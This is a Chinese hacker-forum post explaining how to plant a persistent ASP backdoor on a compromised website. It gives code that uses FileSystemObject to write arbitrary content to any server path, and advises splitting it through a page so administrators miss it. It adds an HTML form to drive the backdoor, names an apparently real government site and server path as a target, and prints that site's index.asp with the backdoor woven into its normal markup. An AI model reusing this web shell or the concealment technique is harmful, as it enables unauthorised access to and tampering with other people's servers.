I'n Blog 之萬象真藏

1.隨便找他一個頁面，然後把如下內容分開插入到它的主頁了，注意一下上下文。內容（fso):
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.createObject("scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.createTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
 
最好要分開插入！！
這樣管理員也不容易發現。
2.
將下內容保存到本地為一個htm，並把action="#",改成你插入到的頁面，再添下絕對路徑就好了。你要知道路徑！！內容：
<form action=』#』 method=post>保存<input type=text name=syfdpath width=32 size=50><br>路徑<br>內容:<textarea name=cyfddata cols=80 rows=10 width=32></textarea><input type=submit value=保存></form>
 
註：此方法為鞏固後門使用！！！
有人說不行？？？？
自己看看截圖

大家可以把上內容的action改成"http://www.bjhi.gov.cn/web/biaozhun/index.asp"
路徑添"E:\inetpub\bjhi\web\biaozhun\xxxx.asp"
試下
最後用"http://www.bjhi.gov.cn/web/biaozhun/xxxx.asp"訪問看看！！
改後的index.asp：
<!--#include file="head.asp"-->
<!--#include file="../../conn/xxfw_opendb.asp"-->
<script language= "javascript">
function newpage(htmlurl) {
var newwin=window.open(htmlurl,"newWin","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=yes,resizable=no,top=2,left=2,width=778,height=600");
newwin.focus();
return false;
}
</script>
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<table width="778" border="0" cellspacing="0" cellpadding="0" height="23" class="a" align="center">
<tr>
<td width="22"><img src="../biaozhun/images/a_r2_c1.jpg" width="22" height="23"></td>
<td width="13"><img src="../biaozhun/images/a_r2_c3.jpg" width="13" height="23"></td>
<td width="13"><img src="images/a_r2_c3.jpg" width="13" height="23"></td>
<td background="images/a_r2_c4.jpg"><font color="#006699"><a href="../xinxi/zxxx/index.asp"><font color="#006699">資訊信息</font></a><font color="#006699">
| <a href="../xinxi/ggxc/index.asp"><font color="#006699">廣告宣傳</font></a>
| <a href="../peixun/px.asp"><font color="#006699">網上培訓</font></a> | <a href="index.asp"><font color="#006699">標準規範</font></a>
| <a href="../yjqk/index.asp"><font color="#006699">郵箱期刊</font></a> | <a href="../xinxi/jsfw/index.asp"><font color="#006699">技術服務</font></a>
| <a href="../xinxi/qysw/index.asp"><font color="#006699">企業上網</font></a>
| <a href="../xinxi/xihd/index.asp"><font color="#006699">信息互動</font></a>
|</font> </font></td>
</tr>
</table>
<table width="778" border="0" cellspacing="0" cellpadding="0" height="23" align="center">
<tr bgcolor="CAF2FA">
<td width="589"><font size="2">　　你的位置：</font>>> <a href="../../soye/index.asp" class="a">綜合主頁</a>
>> <font size="2">標準規範</font></td>
<% on error resume next %>
<% Set objFSO = Server.createObject("scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<td width="170"> </td>
</tr>
</table>
<table width="778" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td width="20" background="images/a_r4_c1.jpg"> <% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.createTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
</td>
<td width="758" background="images/a_r4_c1.jpg"><img src="images/biaozhun.jpg" width="144" height="44"></td>
</tr>
</table>
<table width="778" border="0" cellspacing="0" cellpadding="0" height="30" align="center">
<tr>
<td width="103" height="7">&nbs<% if err =0 then %>
<% response.write "<font color=red>save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>p;</td>
<td width="575" height="7"> <% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %> <% set rs=server.createobject("adodb.recordset")
rs.open "select * from border",conn,1,1%><br><% err.clear %>
<form name="form1" method="post" action="result.asp">
<div align="center"><span class="a">選擇類別：
<select name="select" class="select">
<option selected value="0">請選擇類別</option>
<%count=rs.RecordCount
for i=1 to count
if rs("borderid")<>8 then%>
<option value="<%Response.Write (rs("borderid"))%>"><%Response.Write (rs("bordername"))%></option>
<%end if
rs.MoveNext
next
rs.Close%>
</select>
輸入關鍵字
<input type="text" name="keys" class="input" size="20">
</span> 　
<input type="submit" name="Submit" value="查 詢" style="height:20px;background-color:#f3f3f3;border:1 solid black" onMouseOver ="this.style.backgroundColor=』#cff6fb'" onMouseOut ="this.style.backgroundColor=』#ffffff'">
</div>
</form>
</td>
<td width="100" height="7"> </td>
</tr>
</table>
<div align="center">
<table width="535" border="0" cellspacing="0" cellpadding="0" height="25" class="a">
<tr>
<td height="25">
<table width="533" border="1" cellspacing="0" cellpadding="0" align="top" class="a" height="20" bordercolor="E7ECE6">
<%
border=""
color=1
number=15 』默認值
auditer=0
articlefrom=""
set rs=server.createobject("adodb.recordset")
rs.open "select * from info where typeid=2 and bz_sh=1 order by date desc ",conn,1,1
if err.number <> 0 then
response.write "數據庫出錯"
else
if rs.bof and rs.eof then
rs.close
response.write "該專欄目前沒有信息服務內容"
else
if request("page")="" then
curpage = 1
else
curpage = cint(request("page"))
end if
if request("num")="" then
num = 1
else
num = cint(request("num"))
end if
rs.pagesize=cint(number)
rs.absolutepage = curpage
thisnumcol=cstr(rs.recordcount)-num
prenum=cstr(rs.recordcount)-thisnumcol-15
for i = 1 to rs.pagesize
%>
<tr>
<!--<td width="17" bgcolor="EBEDEA" height="15">
<div align="center"><img src="images/09.jpg" width="9" height="9"></div>
</td>-->
<td width="8%" bgcolor="EBEDEA" height="15">
<div align="center"><%Response.Write (num)%></div>
</td>
<td width="75%" height="15" bgcolor="<%if color mod 2=0 then
response.write "#FFFFFF"
else
response.write "#CFF6FB"
end if %>"> <%=trim(rs("title"))%></td>
<td align="center" width="17%" height="15" bgcolor="<%if color mod 2=0 then
response.write "#FFFFFF"
else
response.write "#CFF6FB"
end if %>">
<a href="showinfo.asp?infoid=<%=rs("infoid")%>" onClick="return newpage(this.href);">查看詳情</a></td>
</tr>
<% rs.movenext
num=num+1
color=color+1
if rs.eof then
i = i + 1
exit for
end if
next %></table><br><font size="2">
<% endnum=cstr(rs.recordcount)-(cstr(rs.recordcount) mod 15)+1
response.write "<div align=center>"
response.write "第<font color=red>" + cstr(curpage) + "</font>頁/總<font color=red>" + cstr(rs.pagecount) + "</font>頁 "
response.write "本頁<font color=red>" + cstr(i-1) + "</font>條/總<font color=red>" + cstr(rs.recordcount) + "</font>條 "
if curpage = 1 then
response.write "首頁 前頁 "
else
response.write "<a href=』index.asp?page=1&num=1』>首頁</a> <a href=』index.asp?page=" & cstr(curpage-1) & "&num="&prenum&"』>前頁</a> "
end if
if curpage = rs.pagecount then
response.write "後頁 末頁"
else
response.write "<a href=』index.asp?page=" + cstr(curpage+1) + "&num="&num&"』>後頁</a> <a href=』index.asp?page=" + cstr(rs.pagecount) + "&num="&endnum&"』>末頁</a>"
end if
end If
end if
』?typeid=" & cstr(request("typeid")) & "&borderid=" & cstr(request("borderid")) & "& page=1』>
response.write "<div align=center><hr size=0 width=』85%』>"%></font>
</table>
</div>
<!--#include file="foot.asp"-->
<!--#include file="../../conn/closedb.asp"-->

資料來源 中國黑客聯盟 by 新疆人胡胡